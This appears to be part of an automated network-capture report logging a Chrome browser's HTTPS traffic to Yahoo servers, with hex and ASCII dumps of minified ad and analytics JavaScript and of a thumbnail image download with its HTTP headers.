                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (e,t)=>{if(window.benji&&"function"==typeof window.benji.updateI13N){const{adMeta:i,spaceId:s,homepageUrl:n,presentation:a}=e.meta.data,r={},c="frontpage"===t||"fp"===t;r.spaceid=i.spaceid||s||"",i.hashtag&&(r.hashtag=i.hashtag.split(";")),c&&i.site&&(r.s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 69 65 77 65 72 57 69 6c 6c 4f 70 65 6e 3a 78 2c 6f 6e 56 69 65 77 65 72 4f 70 65 6e 65 64 3a 52 2c 6f 6e 56 69 65 77 65 72 43 6c 6f 73 65 64 3a 54 2c 6f 6e 56 69 65 77 65 72 44 69 64 43 6c 6f 73 65 3a 44 7d 3b 63 6f 6e 73 74 20 42 3d 22 41 55 54 4f 22 2c 46 3d 5b 22 49 4e 41 52 54 49 43 4c 45 22 2c 22 49 4e 41 52 54 49 43 4c 45 2d 31 22 2c 22 57 49 44 47 45 54 22 2c 22 57 49 44 47 45 54 2d 31 22 2c 22 57 49 44 47 45 54 41 22 5d 2c 5f 3d 5b 22 63 61 61 73 2d 69 6d 61 67 65 2d 6c 69 67 68 74 62 6f 78 22 5d 2c 24 3d 7b 61 74 74 3a 22 73 62 63 22 2c 66 72 6f 6e 74 69 65 72 3a 22 66 74 72 22 2c 72 6f 67 65 72 73 3a 22 72 6f 67 65 72 73 2d 61 63 73 22 7d 2c 48 3d 5b 22 57 49 44 47 45 54 41 22 5d 3b 63 6f 6e 73 74 20 57 3d 7b 61 72 74 69 63 6c 65 3a 22 73 74 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: iewerWillOpen:x,onViewerOpened:R,onViewerClosed:T,onViewerDidClose:D};const B="AUTO",F=["INARTICLE","INARTICLE-1","WIDGET","WIDGET-1","WIDGETA"],_=["caas-image-lightbox"],$={att:"sbc",frontier:"ftr",rogers:"rogers-acs"},H=["WIDGETA"];const W={article:"sto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 73 2e 73 70 61 63 65 69 64 3d 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 3f 2e 67 65 74 52 61 70 69 64 41 74 74 72 69 62 75 74 65 28 22 73 70 61 63 65 69 64 22 29 2c 74 68 69 73 2e 6d 61 69 6e 41 72 74 69 63 6c 65 52 61 70 69 64 43 6f 6e 66 69 67 3d 69 2c 74 68 69 73 2e 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 52 61 70 69 64 43 6f 6e 66 69 67 3d 73 7d 6f 6e 56 69 65 77 65 72 57 69 6c 6c 4f 70 65 6e 28 29 7b 74 68 69 73 2e 68 6f 6d 65 55 72 6c 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 74 68 69 73 2e 76 69 65 77 65 64 41 72 74 69 63 6c 65 73 2e 63 6c 65 61 72 28 29 7d 6f 6e 43 6c 69 63 6b 28 65 29 7b 22 73 6c 69 64 65 73 68 6f 77 22 3d 3d 3d 65 2e 74 79 70 65 3f 74 68 69 73 2e 6f 6e 53 6c 69 64 65 73 68 6f 77 43 6c 69 63 6b 28 65 29 3a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s.spaceid=window.rapidInstance?.getRapidAttribute("spaceid"),this.mainArticleRapidConfig=i,this.clusterArticleRapidConfig=s}onViewerWillOpen(){this.homeUrl=location.href,this.viewedArticles.clear()}onClick(e){"slideshow"===e.type?this.onSlideshowClick(e):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 26 26 28 74 68 69 73 2e 72 65 66 65 72 65 72 55 72 6c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 74 68 69 73 2e 76 69 65 77 65 64 41 72 74 69 63 6c 65 73 2e 61 64 64 28 65 2e 65 6c 65 6d 2e 69 64 29 7d 75 70 64 61 74 65 52 61 70 69 64 41 74 74 72 69 62 75 74 65 73 28 65 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 7b 65 6c 65 6d 3a 74 2c 6d 65 74 61 3a 7b 64 61 74 61 3a 69 7d 7d 3d 65 2c 7b 61 64 4d 65 74 61 3a 73 2c 63 61 6e 6f 6e 69 63 61 6c 55 72 6c 3a 6e 2c 63 6f 6e 74 65 6e 74 54 79 70 65 3a 6f 2c 68 61 73 53 63 72 69 62 62 6c 65 3a 61 3d 21 31 2c 68 61 73 59 61 68 6f 6f 56 69 64 65 6f 3a 72 2c 68 69 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: dow.location.href&&(this.refererUrl=window.location.href),this.viewedArticles.add(e.elem.id)}updateRapidAttributes(e){if(!window.rapidInstance)return;const{elem:t,meta:{data:i}}=e,{adMeta:s,canonicalUrl:n,contentType:o,hasScribble:a=!1,hasYahooVideo:r,hid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 3f 2e 73 65 74 52 61 70 69 64 41 74 74 72 69 62 75 74 65 28 7b 6b 65 79 73 3a 6b 2c 73 70 61 63 65 69 64 3a 76 7d 29 2c 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 26 26 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 2e 69 31 33 6e 26 26 28 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 2e 69 31 33 6e 2e 53 50 41 43 45 49 44 3d 70 61 72 73 65 49 6e 74 28 76 2c 31 30 29 29 7d 62 65 61 63 6f 6e 4d 6f 64 61 6c 43 6f 6e 74 65 6e 74 28 65 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 7b 65 6c 65 6d 3a 7b 69 64 3a 74 7d 7d 3d 65 3b 74 68 69 73 2e 75 70 64 61 74 65 52 61 70 69 64 41 74 74 72 69 62 75 74 65 73 28 65 29 2c 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: indow.rapidInstance?.setRapidAttribute({keys:k,spaceid:v}),window.YAHOO&&window.YAHOO.i13n&&(window.YAHOO.i13n.SPACEID=parseInt(v,10))}beaconModalContent(e){if(!window.rapidInstance)return;const{elem:{id:t}}=e;this.updateRapidAttributes(e),window.rapidIns
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 6e 74 3d 22 68 6f 6d 65 70 61 67 65 2d 76 69 65 77 65 72 22 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 45 76 65 6e 74 3d 22 68 6f 6d 65 70 61 67 65 2d 76 69 65 77 65 72 2d 76 69 65 77 70 6f 72 74 22 2c 74 68 69 73 2e 6f 6e 53 63 72 6f 6c 6c 48 61 6e 64 6c 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 41 64 50 6f 73 69 74 69 6f 6e 73 3d 5b 5d 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 41 64 46 65 74 63 68 53 6c 6f 74 49 6e 64 65 78 3d 5b 5d 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 50 72 65 76 69 6f 75 73 41 64 46 65 74 63 68 53 6c 6f 74 49 6e 64 65 78 3d 5b 5d 2c 74 68 69 73 2e 70 61 67 65 43 6f 6e 74 65 78 74 3d 7b 7d 2c 74 68 69 73 2e 76 69 65 77 65 72 41 64 73 43 6f 6e 66 69 67 3d 7b 7d 2c 74 68 69 73 2e 62 65 6e 6a 69 41 64 49 64 41 72 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nt="homepage-viewer",this.viewportEvent="homepage-viewer-viewport",this.onScrollHandle=null,this.viewportAdPositions=[],this.viewportAdFetchSlotIndex=[],this.viewportPreviousAdFetchSlotIndex=[],this.pageContext={},this.viewerAdsConfig={},this.benjiAdIdArr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 74 68 69 73 2e 6f 6e 50 72 65 50 61 72 73 65 41 64 73 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 70 72 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 73 65 74 57 61 66 65 72 53 74 61 74 65 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 70 72 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 75 70 64 61 74 65 57 61 66 65 72 53 74 61 74 65 49 6e 56 69 65 77 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 6f 6e 41 72 74 69 63 6c 65 49 6e 76 69 65 77 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 69 3f 2e 6f 6e 28 22 52 45 4e 44 45 52 5f 53 55 43 43 45 45 44 45 44 22 2c 74 68 69 73 2e 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: this.onPreParseAds.bind(this)),s.on("caas:article:pre:inview",this.setWaferState.bind(this)),s.on("caas:article:pre:inview",this.updateWaferStateInView.bind(this)),s.on("caas:article:inview",this.onArticleInview.bind(this)),i?.on("RENDER_SUCCEEDED",this.o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 6f 73 69 74 69 6f 6e 4d 65 74 61 2e 70 6f 73 69 74 69 6f 6e 73 29 7b 63 6f 6e 73 74 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 2e 63 6c 65 61 6e 29 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 2e 64 65 73 74 29 2c 6f 3d 2d 31 21 3d 3d 48 2e 69 6e 64 65 78 4f 66 28 74 2e 69 64 29 3b 69 66 28 6f 26 26 73 29 7b 63 6f 6e 73 74 20 65 3d 73 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 3b 69 66 28 65 26 26 65 2e 69 64 2e 65 6e 64 73 57 69 74 68 28 22 2d 62 61 73 65 22 29 29 63 6f 6e 74 69 6e 75 65 7d 69 66 28 73 26 26 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 6e 29 7b 6f 7c 7c 28 74 2e 69 64 3d 22 55 42 41 22 2b 74 2e 69 64 2c 74 2e 63 6c 65 61 6e 3d 74 3f 2e 63 6c 65 61 6e 3f 2e 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ositionMeta.positions){const s=document.getElementById(t.clean),n=document.getElementById(t.dest),o=-1!==H.indexOf(t.id);if(o&&s){const e=s.parentElement;if(e&&e.id.endsWith("-base"))continue}if(s&&s.parentNode&&n){o||(t.id="UBA"+t.id,t.clean=t?.clean?.re


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              60192.168.2.45108387.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC530OUTGET /uu/api/res/1.2/o1vbp9skMm8aYhU74pmr3g--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/16f9bfa0-8532-11ef-8f7e-7d7832959f0a.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1080INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="16f9bfa0-8532-11ef-8f7e-7d7832959f0a.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "9623d7971197b39cbdb5db4cf22447d4"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 04:59:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Request-Id: e226612b79ad57a1753a12e412ac446a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 15:46:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=5;cpu=1;start=2024-10-08T15:46:07.836Z;desc=hit,rtt;dur=106,content-info;desc="width=356,height=180,bytes=7536,owidth=2344,oheight=1320,obytes=304257,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 12449
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: e226612b79ad57a1753a12e412ac446a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 21343
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 00 b4 01 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 00 02 08 01 09 ff c4 00 48 10 00 01 03 03 03 02 04 03 05 05 06 03 06 06 03 00 01 02 03 04 00 05 11 06 12 21 07 31 13 41 51 61 08 22 71 14 32 81 91 a1 15 23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: JFIFCCdH!1AQa"q2#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: ba cc 85 72 91 72 b8 36 85 11 ea 50 82 b5 8f c4 03 51 dc 18 a8 de 7f c2 ee bc 90 c1 79 ad 65 a3 d4 b5 f6 42 66 3e 7f 5f 06 b9 65 0e 45 77 aa fe 18 ba cd f3 fe ca b7 5b af 3e 18 04 a6 df 35 2a 5e 3d 42 5c 08 51 fa 00 4f b5 4e 55 a9 2e 05 39 fb 57 69 eb e6 95 bb 3f 69 d4 76 99 96 c9 cc 92 17 1e 5c 75 b2 e2 7d 0e d5 00 70 7c 8f 63 52 63 89 74 72 e0 15 91 ce 05 17 db c8 a8 68 13 95 76 a1 bb 75 21 53 63 f8 4f 04 28 63 ca 83 3b 54 1a 32 09 21 dd 56 1b 08 f1 3b 7a 9a 04 ad 3f 61 fe f2 46 4b bb a9 29 dd bf b5 74 6d 3f 61 8e ae 41 e9 b7 47 16 55 cf 26 a5 53 b7 03 27 b8 62 67 17 38 56 68 aa dd 83 6b 06 cd a8 66 97 c6 1b 81 eb 4a 1b 7f da bb c7 63 96 10 a7 1e a2 bb c6 08 26 b4 81 c8 34 be 3b 1a 6a 95 60 91 5d e3 b1 18 b3 67 07 ef 57 78 ec 68 e1 2f a1 20 6e 50 14 9e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: rr6PQyeBf>_eEw[>5*^=B\QONU.9Wi?iv\u}p|cRctrhvu!ScO(c;T2!V;z?aFK)tm?aAGU&S'bg8VhkfJc&4;j`]gWxh/ nP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 67 a3 d4 a3 3e 55 db e3 f9 17 6b 24 f4 e5 82 56 a2 bb b3 6c 8f f2 25 5f 33 ae 91 90 da 07 72 7f 3e 07 99 a4 72 4b e4 ec 33 b1 34 55 ae 26 9a d3 d1 6c b6 b6 13 1d 88 e9 e5 29 fe 35 79 a9 47 cd 47 1c 9a 04 a4 98 f4 89 d5 cb 5a 0f 2a 39 fa d1 21 14 c2 24 40 ea 19 e6 43 d6 eb 42 51 bb ed f2 47 8d cf fd cb 60 b8 bc ff 00 94 94 a5 07 d9 7e f5 2a 11 17 04 da a6 b8 b1 85 2f 8a 2a 13 19 3d 4b e5 49 e4 53 92 59 17 68 dd e7 9d 41 0b 65 5b 16 9c 94 ab be 15 82 01 fd 7f 11 91 e6 6a 35 d4 37 ac 0c 68 98 72 fd 67 ea 0e 8e 97 a3 b5 5b 0d ca 8d 2d 1e 11 0b fb cc ba 38 f9 4f f0 a8 1e 52 ae f8 29 3d 8d 67 a3 6a ed 9e 50 d9 44 e2 9d 79 a2 9f d0 fa 8e 4d 99 6f 78 ec 05 15 46 77 f9 db f7 f7 07 20 fb 8a be b6 6e aa e4 13 88 38 51 81 8f 5a 90 c6 9a ec c1 3c 53 19 c6 6d 3f cb fa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: g>Uk$Vl%_3r>rK34U&l)5yGGZ*9!$@CBQG`~*/*=KISYhAe[j57hrg[-8OR)=gjPDyMoxFw n8QZ<Sm?
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 84 27 e5 6f 08 6c 67 84 8f 94 27 27 80 31 9e 05 79 3d 49 39 49 c8 d7 53 86 12 2a 19 1d 33 eb d5 dd 6a 9b 0b 55 e9 6b 0a 11 f3 b4 c3 ab 71 e7 5a f5 25 49 6c a3 23 8e 12 48 e7 bd 36 33 ac 9f 7c 13 1b a1 28 f3 01 cf 59 ae 51 b4 e7 4c 64 32 d2 18 5f da ee 36 c8 65 4d 02 96 d4 51 25 b5 1d a3 cb 86 c8 e0 0e dd ab 41 60 f7 63 26 3a ac 31 5b 25 5d 36 f3 7b 83 63 72 4e 99 63 f6 8b 20 05 18 cb 73 6b 89 23 d0 e0 85 2b d0 1c 03 cf 22 b7 31 69 21 cd 72 55 f6 bd 57 d4 0d 51 a9 1b 6e 0e 80 99 06 de cb 9f de 67 5c 56 96 40 40 ef b5 23 20 fe 0a 3d f9 a6 c6 bd 64 ff 00 84 54 82 a4 5e d0 a7 3c 37 ca 73 fe 55 64 7e 75 74 be e5 81 5a c0 3b 71 be 6a cd 25 25 d3 a4 34 eb 17 9b 6c a5 ae 42 e2 2a 72 63 b8 c3 ea 20 a8 b6 54 92 92 95 77 db c6 0e 4f 9f 01 7e ed 0e 76 e4 63 58 12 47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 'olg''1y=I9IS*3jUkqZ%Il#H63|(YQLd2_6eMQ%A`c&:1[%]6{crNc sk#+"1i!rUWQng\V@@# =dT^<7sUd~utZ;qj%%4lB*rc TwO~vcXG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: e9 c7 ed 9a 8d 36 b8 97 a5 a4 3d 39 c6 49 6d 94 ec ca 3e 50 a1 bc ab 66 c4 8c 8f 98 28 67 8c d7 9f df 2a 17 2d d6 5f 6f ff 00 65 f5 8d f3 4b d9 7f 71 dc 9a 27 44 4e b0 4f 62 5b da ad ab ab 42 1a 62 3e 54 d9 69 4e 14 67 62 c2 4a 95 83 f3 2b 82 af 41 d8 55 3f 19 24 5e 5d 79 2b 18 39 73 e3 cf a7 e6 26 aa b4 6b db 64 05 16 2e 4c 7d 86 5b e8 4e 42 9f 6b ee 95 7a 12 82 71 ff 00 90 d6 e3 d3 97 d8 5e 3b 33 37 74 da f8 39 3a b6 5d 95 5b 59 94 ec 08 69 4a 38 ca e3 b2 65 71 c6 57 08 cc 3d ab 84 18 ca c8 64 d4 6a dd 0a 81 2b a9 cb aa 35 95 d4 70 87 a0 6d d1 f3 1f 6a a2 c3 24 24 3e 80 ac 14 0c 7a d7 27 b4 e4 b0 13 5a d7 c0 e2 af b4 fa d9 38 9f 4a ce d1 5a 25 25 81 98 3a 7a 05 ad b0 c6 57 de bc 16 e2 e5 b6 6e 14 50 de f1 05 a4 47 20 0a 9b 69 26 36 e1 61 15 bd fa 12 96
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6=9Im>Pf(g*-_oeKq'DNOb[Bb>TiNgbJ+AU?$^]y+9s&kd.L}[NBkzq^;37t9:][YiJ8eqW=dj+5pmj$$>z'Z8JZ%%:zWnPG i&6a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 15 c7 28 15 5d a8 49 96 95 11 f2 81 9c 7b d5 ff 00 95 b6 25 63 8b 61 65 86 dc db 1b 77 23 19 e4 73 55 37 77 5b 83 d3 5b 43 1b 53 c8 6d c0 93 59 ab b8 7b 8b 24 ea 52 c3 0b a1 49 0b 6c 01 e5 59 bb 8a 18 64 f8 48 91 6d cc 8a a5 af 4b 04 88 bc 8a 55 7e d0 88 ca e6 28 84 d5 ec 60 9a 95 6f 1d c7 64 01 d4 92 b0 d1 41 c6 54 4f 9d 6e 74 ba 65 65 cb e4 05 b9 31 f6 b0 bc 8e 15 5a eb 49 28 15 f5 e3 b9 11 68 b3 25 24 10 07 15 67 e4 fc 64 8d 1b 6f 92 72 13 65 96 82 2a b6 ef ee 44 ca 6b 68 41 66 69 fb 83 ed 5b a2 46 75 f9 0f 2b 63 6d b4 82 b5 2c 9f 20 07 24 d5 36 d6 de 02 a6 5c 1a 67 e1 b0 5c 50 89 dd 48 79 e8 b1 c7 22 df 15 cd af 2c 1e fb d6 41 08 ec 38 00 9c 13 f7 4d 4f b4 cd 02 34 bf 54 b8 21 a3 4b 69 0b 1a 2c da 52 c9 1a d5 0d a1 84 b6 ca 06 e3 ee 54 79 51 3e 64 e4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (]I{%caew#sU7w[[CSmY{$RIlYdHmKU~(`odATOntee1ZI(h%$gdore*DkhAfi[Fu+cm, $6\g\PHy",A8MO4T!Ki,RTyQ>d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC61INData Raw: 26 ea 2d 53 af f5 46 a3 71 ab 7e 93 bc b2 b7 08 29 8c cc 17 dc 75 c6 95 b4 25 5b 76 93 b5 5c 72 3c c8 15 27 c4 94 b8 c0 cf aa c2 3c 48 b3 ba 6b d0 c8 3a fa 0b 17 ce b1 6a b5 68 dd 34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &-SFq~)u%[v\r<'<Hk:jh4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: fe f6 a1 36 85 a4 48 90 e2 4e 14 92 b5 05 34 ce 08 50 21 7f 38 23 05 03 35 69 67 a4 39 76 42 bb d5 5b e2 90 0f d6 8e 86 e8 2d 03 a8 d3 67 d3 72 4b 96 79 68 0f d9 ef f1 5d 4c ac 60 0d d9 71 04 a3 7a 14 ac 14 81 d8 82 36 64 56 fb 49 d1 ed d5 b6 5c 3e f2 0b b9 9c d6 58 0d d5 19 11 6c 96 bd 25 76 85 31 4b d5 22 c8 c3 57 29 a9 0a 2a 53 cc be f1 65 cd ca 03 21 6c 2e 3b 80 79 03 8f 61 06 51 8a de 88 93 96 ee c9 de 93 d8 b4 b7 5d fe 18 35 46 84 be b7 1d cd 51 a0 3f 68 5c ec 69 2b 4a 64 36 c9 49 79 1b 01 39 2d a9 7b db 52 39 18 d9 d8 ed 23 39 2e d8 33 9d 7a 55 19 f8 da 89 56 59 71 dd 61 f9 09 43 cd 78 89 c6 e4 29 21 40 8f 62 14 92 0f 62 08 c5 54 dd e5 22 e3 49 c3 6f 27 48 5b 74 bd c5 f8 c9 6d 71 ac d2 fd 13 70 8c 76 9f aa 91 cd 51 ee 34 7b 17 e0 8b bf db 0f db 19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6HN4P!8#5ig9vB[-grKyh]L`qz6dVI\>Xl%v1K"W)*Se!l.;yaQ]5FQ?h\i+Jd6Iy9-{R9#9.3zUVYqaCx)!@bbT"Io'H[tmqpvQ4{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 06 57 91 c0 cc 6b eb 6f 1a ae e5 fe 21 ed e5 94 6d 9a e1 ad 7a 71 ad 9b 93 64 7a 5c 29 92 bc 48 fb d2 d2 86 e4 2d 05 2a 49 ec 0a 79 fe 12 41 18 e7 1c 56 75 ae 46 be 83 49 6d df 75 8e 86 b5 75 2a db 2e c4 d4 ce 9d 78 50 2e 56 b8 89 71 ab 84 78 8b 91 b5 87 14 16 48 75 90 57 b3 7e e0 52 56 12 ae 02 6a b6 ee 24 bb 49 6c 65 ad 3f a8 f6 c8 d0 d2 6e 71 a6 59 5d 75 00 ec 9c c2 9a 41 3e 40 2c 8c 28 7b 8c 8a a4 95 bb 7d 33 42 b5 17 f8 05 a5 df 6d fa 9a d6 62 88 28 9c 95 72 e3 ab 77 6a 37 7a f7 ff 00 af 00 50 dd ad 65 d1 29 5e 50 7d c8 79 a7 a1 ca b5 b2 c3 0e 01 21 a7 41 f1 23 48 7c 29 21 23 f8 41 24 9f ce 84 e1 59 76 83 7b b4 63 ce 42 8b 6d c7 ff 00 aa 21 4d 80 19 b5 90 94 b1 21 bd e1 4d 94 8e c7 83 e9 fe 94 9b 27 9c 34 35 de 45 74 c9 f9 97 2e 92 c6 eb 6c 5e a1 f5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Wko!mzqdz\)H-*IyAVuFImuu*.xP.VqxHuW~RVj$Ile?nqY]uA>@,({}3Bmb(rwj7zPe)^P}y!A#H|)!#A$Yv{cBm!M!M'45Et.l^
